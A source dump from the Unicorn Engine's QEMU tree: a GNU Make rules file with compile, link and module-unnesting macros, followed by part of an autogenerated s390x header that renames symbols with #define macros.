# Flags for dependency generation
QEMU_DGFLAGS += -MMD -MP -MT $@ -MF $(@D)/$(*F).d

# Compiler searches the source file dir first, but in vpath builds
# we need to make it search the build dir too, before any other
# explicit search paths. There are two search locations in the build
# dir, one absolute and the other relative to the compiler working
# directory. These are the same for target-independent files, but
# different for target-dependent ones.
QEMU_LOCAL_INCLUDES = -iquote $(BUILD_DIR)/$(@D) -iquote $(@D)

WL_U := -Wl,-u,
find-symbols = $(if $1, $(sort $(shell $(NM) -P -g $1 | $2)))
defined-symbols = $(call find-symbols,$1,awk '$$2!="U"{print $$1}')
undefined-symbols = $(call find-symbols,$1,awk '$$2=="U"{print $$1}')

# All the .mo objects in -m variables are also added into the corresponding -y
# variable in unnest-vars, but filtered out here, when LINK is called.
#
# The .mo objects are supposed to be linked as a DSO, for module build. So here
# they are only used as placeholders to generate those "archive undefined"
# symbol options (-Wl,-u,$symbol_name), which are the archive functions
# referenced by the code in the DSO.
#
# Also, their presence in the -y variables guarantees they are built before
# linking executables that will load them. So we can look up symbol references
# in LINK.
#
# This is necessary because the executable itself may not use the function, in
# which case the function would not be linked in. Then the DSO loading will
# fail because of the missing symbol.
process-archive-undefs = $(filter-out %.a %.mo,$1) \
    $(addprefix $(WL_U), \
        $(filter $(call defined-symbols,$(filter %.a, $1)), \
            $(call undefined-symbols,$(filter %.mo,$1)))) \
    $(filter %.a,$1)

extract-libs = $(strip $(foreach o,$(filter-out %.mo,$1),$($o-libs)))
expand-objs = $(strip $(sort $(filter %.o,$1)) \
    $(foreach o,$(filter %.mo,$1),$($o-objs)) \
    $(filter-out %.o %.mo,$1))

%.o: %.c
	$(call quiet-command,$(CC) $(QEMU_LOCAL_INCLUDES) $(QEMU_INCLUDES) \
	    $(QEMU_CFLAGS) $(QEMU_DGFLAGS) $(CFLAGS) $($@-cflags) \
	    -c -o $@ $<,"CC","$(TARGET_DIR)$@")
%.o: %.rc
	$(call quiet-command,$(WINDRES) -I. -o $@ $<,"RC","$(TARGET_DIR)$@")
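# For example (hypothetical object and flag, shown for illustration only),
# a makefile can attach per-object compile flags that the %.o: %.c rule
# above picks up through $($@-cflags):
#   foo/bar.o-cflags := -DSPECIAL_BUILD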
# If we have a CXX we might have some C++ objects, in which case we
# must link with the C++ compiler, not the plain C compiler.
LINKPROG = $(or $(CXX),$(CC))

LINK = $(call quiet-command, $(LINKPROG) $(CFLAGS) $(QEMU_LDFLAGS) -o $@ \
    $(call process-archive-undefs, $1) \
    $(version-obj-y) $(call extract-libs,$1) $(LIBS),"LINK","$(TARGET_DIR)$@")

%.o: %.S
	$(call quiet-command,$(CCAS) $(QEMU_LOCAL_INCLUDES) $(QEMU_INCLUDES) \
	    $(QEMU_CFLAGS) $(QEMU_DGFLAGS) $(CFLAGS) \
	    -c -o $@ $<,"CCAS","$(TARGET_DIR)$@")

%.o: %.cc
	$(call quiet-command,$(CXX) $(QEMU_LOCAL_INCLUDES) $(QEMU_INCLUDES) \
	    $(QEMU_CXXFLAGS) $(QEMU_DGFLAGS) $(CFLAGS) $($@-cflags) \
	    -c -o $@ $<,"CXX","$(TARGET_DIR)$@")

%.o: %.cpp
	$(call quiet-command,$(CXX) $(QEMU_LOCAL_INCLUDES) $(QEMU_INCLUDES) \
	    $(QEMU_CXXFLAGS) $(QEMU_DGFLAGS) $(CFLAGS) $($@-cflags) \
	    -c -o $@ $<,"CXX","$(TARGET_DIR)$@")

%.o: %.m
	$(call quiet-command,$(OBJCC) $(QEMU_LOCAL_INCLUDES) $(QEMU_INCLUDES) \
	    $(QEMU_CFLAGS) $(QEMU_DGFLAGS) $(CFLAGS) $($@-cflags) \
	    -c -o $@ $<,"OBJC","$(TARGET_DIR)$@")

%.o: %.dtrace
	$(call quiet-command,dtrace -o $@ -G -s $<,"GEN","$(TARGET_DIR)$@")

DSO_OBJ_CFLAGS := -fPIC -DBUILD_DSO
module-common.o: CFLAGS += $(DSO_OBJ_CFLAGS)
%$(DSOSUF): QEMU_LDFLAGS += $(LDFLAGS_SHARED)
%$(DSOSUF): %.mo
	$(call LINK,$^)
	@# Copy to build root so modules can be loaded when program started without install
	$(if $(findstring /,$@),$(call quiet-command,cp $@ $(subst /,-,$@),"CP","$(subst /,-,$@)"))

LD_REL := $(CC) -nostdlib $(LD_REL_FLAGS)

%.mo:
	$(call quiet-command,$(LD_REL) -o $@ $^,"LD","$(TARGET_DIR)$@")

.PHONY: modules
modules:

%$(EXESUF): %.o
	$(call LINK,$(filter %.o %.a %.mo, $^))

%.a:
	$(call quiet-command,rm -f $@ && $(AR) rcs $@ $^,"AR","$(TARGET_DIR)$@")

# Usage: $(call quiet-command,command and args,"NAME","args to print")
# This will run "command and args", and either:
#  if V=1 just print the whole command and args
#  otherwise print the 'quiet' output in the format "  NAME    args to print"
# NAME should be a short name of the command, 7 letters or fewer.
# If called with only a single argument, will print nothing in quiet mode.
quiet-command-run = $(if $(V),,$(if $2,printf "  %-7s %s\n" $2 $3 && ))$1
quiet-@ = $(if $(V),,@)
quiet-command = $(quiet-@)$(call quiet-command-run,$1,$2,$3)

# cc-option
# Usage: CFLAGS+=$(call cc-option, -falign-functions=0, -malign-functions=0)
cc-option = $(if $(shell $(CC) $1 $2 -S -o /dev/null -xc /dev/null \
              >/dev/null 2>&1 && echo OK), $2, $3)
cc-c-option = $(if $(shell $(CC) $1 $2 -c -o /dev/null -xc /dev/null \
                >/dev/null 2>&1 && echo OK), $2, $3)

VPATH_SUFFIXES = %.c %.h %.S %.cc %.cpp %.m %.mak %.texi %.sh %.rc Kconfig% %.json.in
set-vpath = $(if $1,$(foreach PATTERN,$(VPATH_SUFFIXES),$(eval vpath $(PATTERN) $1)))

# install-prog list, dir
define install-prog
	$(INSTALL_DIR) "$2"
	$(INSTALL_PROG) $1 "$2"
	$(if $(STRIP),$(STRIP) $(foreach T,$1,"$2/$(notdir $T)"),)
endef

# find-in-path
# Usage: $(call find-in-path, prog)
# Looks in the PATH if the argument contains no slash, else only considers one
# specific directory. Returns an empty string if the program doesn't exist
# there.
find-in-path = $(if $(findstring /, $1), \
        $(wildcard $1), \
        $(wildcard $(patsubst %, %/$1, $(subst :, ,$(PATH)))))
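# For example (hypothetical generator rule, shown for illustration only),
# a step wired through quiet-command prints "  GEN     out.h" in quiet mode
# and the full command line when V=1:
#   out.h: out.h.in
#           $(call quiet-command, sed -e 's/@X@/1/' < $< > $@,"GEN","$@")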
# Logical functions (for operating on y/n values like CONFIG_FOO vars)
# Inputs to these must be either "y" (true) or "n" or "" (both false)
# Output is always either "y" or "n".
# Usage: $(call land,$(CONFIG_FOO),$(CONFIG_BAR))
# Logical NOT
lnot = $(if $(subst n,,$1),n,y)
# Logical AND
land = $(if $(findstring yy,$1$2),y,n)
# Logical OR
lor = $(if $(findstring y,$1$2),y,n)
# Logical XOR (note that this is the inverse of leqv)
lxor = $(if $(filter $(call lnot,$1),$(call lnot,$2)),n,y)
# Logical equivalence (note that leqv "","n" is true)
leqv = $(if $(filter $(call lnot,$1),$(call lnot,$2)),y,n)
# Logical if: like make's $(if) but with an leqv-like test
lif = $(if $(subst n,,$1),$2,$3)

# String testing functions: inputs to these can be any string;
# the output is always either "y" or "n". Leading and trailing whitespace
# is ignored when comparing strings.
# String equality
eq = $(if $(subst $2,,$1)$(subst $1,,$2),n,y)
# String inequality
ne = $(if $(subst $2,,$1)$(subst $1,,$2),y,n)
# Emptiness/non-emptiness tests:
isempty = $(if $1,n,y)
notempty = $(if $1,y,n)

# Generate files with tracetool
TRACETOOL=$(PYTHON) $(SRC_PATH)/scripts/tracetool.py

# Generate timestamp files for .h include files
config-%.h: config-%.h-timestamp
	@cmp $< $@ >/dev/null 2>&1 || cp $< $@

config-%.h-timestamp: config-%.mak $(SRC_PATH)/scripts/create_config
	$(call quiet-command, sh $(SRC_PATH)/scripts/create_config < $< > $@,"GEN","$(TARGET_DIR)config-$*.h")

.PHONY: clean-timestamp
clean-timestamp:
	rm -f *.timestamp
clean: clean-timestamp

# will delete the target of a rule if commands exit with a nonzero exit status
.DELETE_ON_ERROR:

# save-vars
# Usage: $(call save-vars, vars)
# Save each variable $v in $vars as save-vars-$v, save their object's
# variables, then clear $v. saved-vars-$v contains the variables that
# were saved for the objects, in order to speed up load-vars.
define save-vars
$(foreach v,$1,
    $(eval save-vars-$v := $(value $v))
    $(eval saved-vars-$v := $(foreach o,$($v), \
        $(if $($o-cflags), $o-cflags $(eval save-vars-$o-cflags := $($o-cflags))$(eval $o-cflags := )) \
        $(if $($o-libs), $o-libs $(eval save-vars-$o-libs := $($o-libs))$(eval $o-libs := )) \
        $(if $($o-objs), $o-objs $(eval save-vars-$o-objs := $($o-objs))$(eval $o-objs := ))))
    $(eval $v := ))
endef

# load-vars
# Usage: $(call load-vars, vars, add_var)
# Load the saved value for each variable in @vars, and the per object
# variables.
# Append @add_var's current value to the loaded value.
define load-vars
$(eval $2-new-value := $(value $2))
$(foreach v,$1,
    $(eval $v := $(value save-vars-$v))
    $(foreach o,$(saved-vars-$v),
        $(eval $o := $(save-vars-$o)) $(eval save-vars-$o := ))
    $(eval save-vars-$v := )
    $(eval saved-vars-$v := ))
$(eval $2 := $(value $2) $($2-new-value))
endef

# fix-paths
# Usage: $(call fix-paths, obj_path, src_path, vars)
# Add prefix @obj_path to all objects in @vars, and add prefix @src_path to all
# directories in @vars.
define fix-paths
$(foreach v,$3,
    $(foreach o,$($v),
        $(if $($o-libs),
            $(eval $1$o-libs := $($o-libs)))
        $(if $($o-cflags),
            $(eval $1$o-cflags := $($o-cflags)))
        $(if $($o-objs),
            $(eval $1$o-objs := $(addprefix $1,$($o-objs)))))
    $(eval $v := $(addprefix $1,$(filter-out %/,$($v))) \
        $(addprefix $2,$(filter %/,$($v)))))
endef
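# For example (hypothetical inputs, shown for illustration only), given
#   hot = fire.o season/
# the call $(call fix-paths,../,src/,hot) leaves
#   hot = ../fire.o src/season/
# i.e. objects get the obj_path prefix and directories the src_path prefix.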
# unnest-var-recursive
# Usage: $(call unnest-var-recursive, obj_prefix, vars, var)
#
# Unnest @var by including subdir Makefile.objs, while keeping others in @vars
# unchanged.
#
# @obj_prefix is the starting point of the object path prefix.
#
define unnest-var-recursive
$(eval dirs := $(sort $(filter %/,$($3))))
$(eval $3 := $(filter-out %/,$($3)))
$(foreach d,$(dirs:%/=%),
    $(call save-vars,$2)
    $(eval obj := $(if $1,$1/)$d)
    $(eval -include $(SRC_PATH)/$d/Makefile.objs)
    $(call fix-paths,$(if $1,$1/)$d/,$d/,$2)
    $(call load-vars,$2,$3)
    $(call unnest-var-recursive,$1,$2,$3))
endef
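# Sketch of the save/include/load sequence used by unnest-var-recursive above
# (hypothetical variable and subdir, shown for illustration only):
#   $(call save-vars, obj-y)           # stash obj-y, then clear it
#   include sub/Makefile.objs          # subdir appends: obj-y += bar.o
#   $(call fix-paths,sub/,sub/,obj-y)  # bar.o becomes sub/bar.o
#   $(call load-vars, obj-y, obj-y)    # obj-y = saved value + sub/bar.o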
# unnest-vars
# Usage: $(call unnest-vars, obj_prefix, vars)
#
# @obj_prefix: object path prefix, can be empty, or '..', etc. Don't include
# ending '/'.
#
# @vars: the list of variable names to unnest.
#
# This macro will scan subdirectories' Makefile.objs, include them, to build
# up each variable listed in @vars.
#
# Per object and per module cflags and libs are saved with relative path fixed
# as well; those variables include -libs, -cflags and -objs. Items in -objs are
# also fixed to relative path against SRC_PATH plus the prefix @obj_prefix.
#
# All nested variables postfixed by -m in names are treated as DSO variables,
# and will be built as modules, if enabled.
#
# A simple example of the unnest:
#
#   obj_prefix = ..
#   vars = hot cold
#   hot  = fire.o sun.o season/
#   cold = snow.o water/ season/
#
# Unnest through a faked source directory structure:
#
#   SRC_PATH
#    ├── water
#    │    └── Makefile.objs ─────────────────┐
#    │        │ hot  += steam.o              │
#    │        │ cold += ice.mo               │
#    │        │ ice.mo-libs := -licemaker    │
#    │        │ ice.mo-objs := ice1.o ice2.o │
#    │        └──────────────────────────────┘
#    │
#    └── season
#         └── Makefile.objs ─────┐
#             │ hot += summer.o  │
#             │ cold += winter.o │
#             └──────────────────┘
#
# In the end, the result will be:
#
#   hot  = ../fire.o ../sun.o ../season/summer.o
#   cold = ../snow.o ../water/ice.mo ../season/winter.o
#   ../water/ice.mo-libs = -licemaker
#   ../water/ice.mo-objs = ../water/ice1.o ../water/ice2.o
#
# Note that 'hot' didn't include 'water/' in the input, so 'steam.o' is not
# included.
#
define unnest-vars
# In the case of target build (i.e. $1 == ..), fix path for top level
# Makefile.objs objects
$(if $1,$(call fix-paths,$1/,,$2))

# Descend and include every subdir Makefile.objs
$(foreach v, $2,
    $(call unnest-var-recursive,$1,$2,$v)
    # Pass the .mo-cflags and .mo-libs along to its member objects
    $(foreach o, $(filter %.mo,$($v)),
        $(foreach p,$($o-objs),
            $(if $($o-cflags), $(eval $p-cflags += $($o-cflags)))
            $(if $($o-libs), $(eval $p-libs += $($o-libs))))))

# For all %.mo objects that are directly added into -y, just expand them
$(foreach v,$(filter %-y,$2),
    $(eval $v := $(foreach o,$($v),$(if $($o-objs),$($o-objs),$o))))

$(foreach v,$(filter %-m,$2),
    # All .o found in *-m variables are single object modules, create .mo
    # for them
    $(foreach o,$(filter %.o,$($v)),
        $(eval $(o:%.o=%.mo)-objs := $o))
    # Now unify .o in -m variable to .mo
    $(eval $v := $($v:%.o=%.mo))
    $(eval modules-m += $($v))

    # For module build, build shared libraries during "make modules"
    # For non-module build, add -m to -y
    $(if $(CONFIG_MODULES),
        $(foreach o,$($v),
            $(eval $($o-objs): CFLAGS += $(DSO_OBJ_CFLAGS))
            $(eval $o: $($o-objs)))
        $(eval $(patsubst %-m,%-y,$v) += $($v))
        $(eval modules: $($v:%.mo=%$(DSOSUF))),
        $(eval $(patsubst %-m,%-y,$v) += $(call expand-objs, $($v)))))

# Post-process all the unnested vars
$(foreach v,$2,
    $(foreach o, $(filter %.mo,$($v)),
        # Find all the .mo objects in variables and add dependency rules
        # according to .mo-objs. Report an error if not set
        $(if $($o-objs),
            $(eval $(o:%.mo=%$(DSOSUF)): module-common.o $($o-objs)),
            $(error $o added in $v but $o-objs is not set)))
    $(shell mkdir -p ./ $(sort $(dir $($v))))
    # Include all the .d files
    $(eval -include $(patsubst %.o,%.d,$(patsubst %.mo,%.d,$($v))))
    $(eval $v := $(filter-out %/,$($v))))
endef

TEXI2MAN = $(call quiet-command, \
    perl -Ww -- $(SRC_PATH)/scripts/texi2pod.pl $(TEXI2PODFLAGS) $< $@.pod && \
    $(POD2MAN) --section=$(subst .,,$(suffix $@)) --center=" " --release=" " $@.pod > $@, \
    "GEN","$@")

%.1:
	$(call TEXI2MAN)
%.7:
	$(call TEXI2MAN)
%.8:
	$(call TEXI2MAN)

GEN_SUBST = $(call quiet-command, \
    sed -e "s!@libexecdir@!$(libexecdir)!g" < $< > $@, \
    "GEN","$@")

%.json: %.json.in
	$(call GEN_SUBST)

# Support for building multiple output files by atomically executing
# a single rule which depends on several input files (so the rule
# will be executed exactly once, not once per output file, and
# not multiple times in parallel.) For more explanation see:
# https://www.cmcrossroads.com/article/atomic-rules-gnu-make

# Given a space-separated list of filenames, create the name of
# a 'sentinel' file to use to indicate that they have been built.
# We use fixed text on the end to avoid accidentally triggering
# automatic pattern rules, and . on the start to make the file
# not show up in ls output.
sentinel = .$(subst $(SPACE),_,$(subst /,_,$1)).sentinel.

# Define an atomic rule that builds multiple outputs from multiple inputs.
# To use:
#   $(call atomic,out1 out2 ...,in1 in2 ...)
#   <TAB>rule to do the operation
#
# Make 4.3 will have native support for this, and you would be able
# to instead write:
#   out1 out2 ... &: in1 in2 ...
#   <TAB>rule to do the operation
#
# The way this works is that it creates a make rule
# "out1 out2 ... : sentinel-file ; @:" which says that the output files
# depend on the sentinel file, and the rule to do that is "do nothing".
# Then we have a rule
# "sentinel-file : in1 in2 ..."
# whose commands start with "touch sentinel-file" and then continue
# with the rule text provided by the user of this 'atomic' function.
# The foreach... is there to delete the sentinel file if any of the
# output files don't exist, so that we correctly rebuild in that situation.
atomic = $(eval $1: $(call sentinel,$1) ; @:) \
         $(call sentinel,$1) : $2 ; @touch $$@ \
         $(foreach t,$1,$(if $(wildcard $t),,$(shell rm -f $(call sentinel,$1))))
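# For example (hypothetical generator and files, shown for illustration only):
#   $(call atomic,gen-a.h gen-b.h,spec.txt)
#   <TAB>./gen-tool spec.txt
# runs ./gen-tool only once to (re)build both headers, even under make -j.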
print-%:
	@echo '$*=$($*)'

unicorn-2.1.1/qemu/s390x.h

/* Autogen header for Unicorn Engine - DONOT MODIFY */
#ifndef UNICORN_AUTOGEN_s390x_H
#define UNICORN_AUTOGEN_s390x_H
#ifndef UNICORN_ARCH_POSTFIX
#define UNICORN_ARCH_POSTFIX _s390x
#endif
#define unicorn_fill_tlb unicorn_fill_tlb_s390x
#define reg_read reg_read_s390x
#define reg_write reg_write_s390x
#define uc_init uc_init_s390x
#define uc_add_inline_hook uc_add_inline_hook_s390x
#define uc_del_inline_hook uc_del_inline_hook_s390x
#define tb_invalidate_phys_range tb_invalidate_phys_range_s390x
#define use_idiv_instructions use_idiv_instructions_s390x
#define arm_arch arm_arch_s390x
#define tb_target_set_jmp_target tb_target_set_jmp_target_s390x
#define have_bmi1 have_bmi1_s390x
#define have_popcnt have_popcnt_s390x
#define have_avx1 have_avx1_s390x
#define have_avx2 have_avx2_s390x
#define have_isa have_isa_s390x
#define have_altivec have_altivec_s390x
#define have_vsx have_vsx_s390x
#define flush_icache_range flush_icache_range_s390x
#define s390_facilities s390_facilities_s390x
#define tcg_dump_op tcg_dump_op_s390x
#define tcg_dump_ops tcg_dump_ops_s390x
#define tcg_gen_and_i64 tcg_gen_and_i64_s390x
#define tcg_gen_discard_i64 tcg_gen_discard_i64_s390x
#define tcg_gen_ld16s_i64 tcg_gen_ld16s_i64_s390x
#define tcg_gen_ld16u_i64 tcg_gen_ld16u_i64_s390x
#define tcg_gen_ld32s_i64 tcg_gen_ld32s_i64_s390x
#define tcg_gen_ld32u_i64 tcg_gen_ld32u_i64_s390x
#define tcg_gen_ld8s_i64 tcg_gen_ld8s_i64_s390x
#define tcg_gen_ld8u_i64 tcg_gen_ld8u_i64_s390x
#define tcg_gen_ld_i64 tcg_gen_ld_i64_s390x
#define tcg_gen_mov_i64 tcg_gen_mov_i64_s390x
#define tcg_gen_movi_i64 tcg_gen_movi_i64_s390x
#define tcg_gen_mul_i64 tcg_gen_mul_i64_s390x
#define tcg_gen_or_i64 tcg_gen_or_i64_s390x
#define tcg_gen_sar_i64 tcg_gen_sar_i64_s390x
#define tcg_gen_shl_i64 tcg_gen_shl_i64_s390x
#define tcg_gen_shr_i64 tcg_gen_shr_i64_s390x
#define tcg_gen_st_i64 tcg_gen_st_i64_s390x
#define tcg_gen_xor_i64 tcg_gen_xor_i64_s390x
#define cpu_icount_to_ns cpu_icount_to_ns_s390x
#define cpu_is_stopped cpu_is_stopped_s390x
#define cpu_get_ticks cpu_get_ticks_s390x
#define cpu_get_clock cpu_get_clock_s390x
#define cpu_resume cpu_resume_s390x
#define qemu_init_vcpu qemu_init_vcpu_s390x
#define cpu_stop_current cpu_stop_current_s390x
#define resume_all_vcpus resume_all_vcpus_s390x
#define vm_start vm_start_s390x
#define address_space_dispatch_compact address_space_dispatch_compact_s390x
#define flatview_translate flatview_translate_s390x
#define address_space_translate_for_iotlb address_space_translate_for_iotlb_s390x
#define qemu_get_cpu qemu_get_cpu_s390x
#define cpu_address_space_init cpu_address_space_init_s390x
#define cpu_get_address_space cpu_get_address_space_s390x
#define cpu_exec_unrealizefn cpu_exec_unrealizefn_s390x
#define cpu_exec_initfn cpu_exec_initfn_s390x
#define cpu_exec_realizefn cpu_exec_realizefn_s390x
#define tb_invalidate_phys_addr tb_invalidate_phys_addr_s390x
#define cpu_watchpoint_insert cpu_watchpoint_insert_s390x
#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_s390x
#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_s390x
#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_s390x
#define cpu_breakpoint_insert cpu_breakpoint_insert_s390x
#define cpu_breakpoint_remove cpu_breakpoint_remove_s390x
#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_s390x
#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_s390x
#define cpu_abort cpu_abort_s390x
#define cpu_physical_memory_test_and_clear_dirty cpu_physical_memory_test_and_clear_dirty_s390x
#define memory_region_section_get_iotlb memory_region_section_get_iotlb_s390x
#define flatview_add_to_dispatch flatview_add_to_dispatch_s390x
#define qemu_ram_get_host_addr qemu_ram_get_host_addr_s390x
#define qemu_ram_get_offset qemu_ram_get_offset_s390x
#define qemu_ram_get_used_length qemu_ram_get_used_length_s390x
#define qemu_ram_is_shared qemu_ram_is_shared_s390x
#define qemu_ram_pagesize qemu_ram_pagesize_s390x
#define qemu_ram_alloc_from_ptr qemu_ram_alloc_from_ptr_s390x
#define qemu_ram_alloc qemu_ram_alloc_s390x
#define qemu_ram_free qemu_ram_free_s390x
#define qemu_map_ram_ptr qemu_map_ram_ptr_s390x
#define qemu_ram_block_host_offset qemu_ram_block_host_offset_s390x
#define qemu_ram_block_from_host qemu_ram_block_from_host_s390x
#define qemu_ram_addr_from_host qemu_ram_addr_from_host_s390x
#define cpu_check_watchpoint cpu_check_watchpoint_s390x
#define iotlb_to_section iotlb_to_section_s390x
#define address_space_dispatch_new address_space_dispatch_new_s390x
#define address_space_dispatch_free address_space_dispatch_free_s390x
#define flatview_read_continue flatview_read_continue_s390x
#define address_space_read_full address_space_read_full_s390x
#define address_space_write address_space_write_s390x
#define address_space_rw address_space_rw_s390x
#define cpu_physical_memory_rw cpu_physical_memory_rw_s390x
#define address_space_write_rom address_space_write_rom_s390x
#define cpu_flush_icache_range cpu_flush_icache_range_s390x
#define cpu_exec_init_all cpu_exec_init_all_s390x
#define address_space_access_valid address_space_access_valid_s390x
#define address_space_map address_space_map_s390x
#define address_space_unmap address_space_unmap_s390x
#define cpu_physical_memory_map cpu_physical_memory_map_s390x
#define cpu_physical_memory_unmap cpu_physical_memory_unmap_s390x
#define cpu_memory_rw_debug cpu_memory_rw_debug_s390x
#define qemu_target_page_size qemu_target_page_size_s390x
#define qemu_target_page_bits qemu_target_page_bits_s390x
#define qemu_target_page_bits_min qemu_target_page_bits_min_s390x
#define target_words_bigendian target_words_bigendian_s390x
#define cpu_physical_memory_is_io cpu_physical_memory_is_io_s390x
#define ram_block_discard_range ram_block_discard_range_s390x
#define ramblock_is_pmem ramblock_is_pmem_s390x
#define page_size_init page_size_init_s390x
#define set_preferred_target_page_bits set_preferred_target_page_bits_s390x
#define finalize_target_page_bits finalize_target_page_bits_s390x
#define cpu_outb cpu_outb_s390x
#define cpu_outw cpu_outw_s390x
#define cpu_outl cpu_outl_s390x
#define cpu_inb cpu_inb_s390x
#define cpu_inw cpu_inw_s390x
#define cpu_inl cpu_inl_s390x
#define memory_map memory_map_s390x
#define memory_map_io memory_map_io_s390x
#define memory_map_ptr memory_map_ptr_s390x
#define memory_cow memory_cow_s390x
#define memory_unmap memory_unmap_s390x
#define memory_moveout memory_moveout_s390x
#define memory_movein memory_movein_s390x
#define memory_free memory_free_s390x
#define flatview_unref flatview_unref_s390x
#define address_space_get_flatview address_space_get_flatview_s390x
#define memory_region_transaction_begin memory_region_transaction_begin_s390x
#define memory_region_transaction_commit memory_region_transaction_commit_s390x
#define memory_region_init memory_region_init_s390x
#define memory_region_access_valid memory_region_access_valid_s390x
#define memory_region_dispatch_read memory_region_dispatch_read_s390x
#define memory_region_dispatch_write memory_region_dispatch_write_s390x
#define memory_region_init_io memory_region_init_io_s390x
#define memory_region_init_ram_ptr memory_region_init_ram_ptr_s390x
#define memory_region_size memory_region_size_s390x
#define memory_region_set_readonly memory_region_set_readonly_s390x
#define memory_region_get_ram_ptr memory_region_get_ram_ptr_s390x
#define memory_region_from_host memory_region_from_host_s390x
#define memory_region_get_ram_addr memory_region_get_ram_addr_s390x
#define memory_region_add_subregion memory_region_add_subregion_s390x
#define memory_region_del_subregion memory_region_del_subregion_s390x
#define memory_region_add_subregion_overlap memory_region_add_subregion_overlap_s390x
#define memory_region_find memory_region_find_s390x
#define memory_region_filter_subregions memory_region_filter_subregions_s390x
#define memory_listener_register memory_listener_register_s390x
#define memory_listener_unregister memory_listener_unregister_s390x
#define address_space_remove_listeners address_space_remove_listeners_s390x
#define address_space_init address_space_init_s390x
#define address_space_destroy address_space_destroy_s390x
#define memory_region_init_ram memory_region_init_ram_s390x
#define memory_mapping_list_add_merge_sorted memory_mapping_list_add_merge_sorted_s390x
#define find_memory_mapping find_memory_mapping_s390x
#define exec_inline_op exec_inline_op_s390x
#define floatx80_default_nan floatx80_default_nan_s390x
#define float_raise float_raise_s390x
#define float16_is_quiet_nan float16_is_quiet_nan_s390x
#define float16_is_signaling_nan float16_is_signaling_nan_s390x
#define float32_is_quiet_nan float32_is_quiet_nan_s390x
#define float32_is_signaling_nan float32_is_signaling_nan_s390x
#define float64_is_quiet_nan float64_is_quiet_nan_s390x
#define float64_is_signaling_nan float64_is_signaling_nan_s390x
#define floatx80_is_quiet_nan floatx80_is_quiet_nan_s390x
#define floatx80_is_signaling_nan floatx80_is_signaling_nan_s390x
#define floatx80_silence_nan floatx80_silence_nan_s390x
#define propagateFloatx80NaN propagateFloatx80NaN_s390x
#define float128_is_quiet_nan float128_is_quiet_nan_s390x
#define float128_is_signaling_nan float128_is_signaling_nan_s390x
#define float128_silence_nan float128_silence_nan_s390x
#define float16_add float16_add_s390x
#define float16_sub float16_sub_s390x
#define float32_add float32_add_s390x
#define float32_sub float32_sub_s390x
#define float64_add float64_add_s390x
#define float64_sub float64_sub_s390x
#define float16_mul float16_mul_s390x
#define float32_mul float32_mul_s390x
#define float64_mul float64_mul_s390x
#define float16_muladd float16_muladd_s390x
#define float32_muladd float32_muladd_s390x
#define float64_muladd float64_muladd_s390x
#define float16_div float16_div_s390x
#define float32_div float32_div_s390x
#define float64_div float64_div_s390x
#define float16_to_float32 float16_to_float32_s390x
#define float16_to_float64 float16_to_float64_s390x
#define float32_to_float16 float32_to_float16_s390x
#define float32_to_float64 float32_to_float64_s390x
#define float64_to_float16 float64_to_float16_s390x
#define float64_to_float32 float64_to_float32_s390x
#define float16_round_to_int float16_round_to_int_s390x
#define float32_round_to_int float32_round_to_int_s390x
#define float64_round_to_int float64_round_to_int_s390x
#define float16_to_int16_scalbn float16_to_int16_scalbn_s390x
#define float16_to_int32_scalbn float16_to_int32_scalbn_s390x
#define float16_to_int64_scalbn float16_to_int64_scalbn_s390x
#define float32_to_int16_scalbn float32_to_int16_scalbn_s390x
#define float32_to_int32_scalbn float32_to_int32_scalbn_s390x
#define float32_to_int64_scalbn float32_to_int64_scalbn_s390x
#define float64_to_int16_scalbn float64_to_int16_scalbn_s390x
#define float64_to_int32_scalbn float64_to_int32_scalbn_s390x
#define float64_to_int64_scalbn float64_to_int64_scalbn_s390x
#define float16_to_int16 float16_to_int16_s390x
#define float16_to_int32 float16_to_int32_s390x
#define float16_to_int64 float16_to_int64_s390x
#define float32_to_int16 float32_to_int16_s390x
#define float32_to_int32 float32_to_int32_s390x
#define float32_to_int64 float32_to_int64_s390x
#define float64_to_int16 float64_to_int16_s390x
#define float64_to_int32 float64_to_int32_s390x
#define float64_to_int64 float64_to_int64_s390x
#define float16_to_int16_round_to_zero float16_to_int16_round_to_zero_s390x
#define float16_to_int32_round_to_zero float16_to_int32_round_to_zero_s390x
#define float16_to_int64_round_to_zero float16_to_int64_round_to_zero_s390x
#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_s390x
#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_s390x
#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_s390x
#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_s390x
#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_s390x
#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_s390x
#define float16_to_uint16_scalbn float16_to_uint16_scalbn_s390x
#define float16_to_uint32_scalbn float16_to_uint32_scalbn_s390x
#define float16_to_uint64_scalbn float16_to_uint64_scalbn_s390x
#define float32_to_uint16_scalbn float32_to_uint16_scalbn_s390x
#define float32_to_uint32_scalbn float32_to_uint32_scalbn_s390x
#define float32_to_uint64_scalbn float32_to_uint64_scalbn_s390x
#define float64_to_uint16_scalbn float64_to_uint16_scalbn_s390x
#define float64_to_uint32_scalbn float64_to_uint32_scalbn_s390x
#define float64_to_uint64_scalbn float64_to_uint64_scalbn_s390x
#define float16_to_uint16 float16_to_uint16_s390x
#define float16_to_uint32 float16_to_uint32_s390x
#define float16_to_uint64 float16_to_uint64_s390x
#define float32_to_uint16 float32_to_uint16_s390x
#define float32_to_uint32 float32_to_uint32_s390x
#define float32_to_uint64 float32_to_uint64_s390x
#define float64_to_uint16 float64_to_uint16_s390x
#define float64_to_uint32 float64_to_uint32_s390x
#define float64_to_uint64 float64_to_uint64_s390x
#define float16_to_uint16_round_to_zero float16_to_uint16_round_to_zero_s390x
#define float16_to_uint32_round_to_zero float16_to_uint32_round_to_zero_s390x
#define float16_to_uint64_round_to_zero float16_to_uint64_round_to_zero_s390x
#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_s390x
#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_s390x
#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_s390x
#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_s390x
#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_s390x
#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_s390x
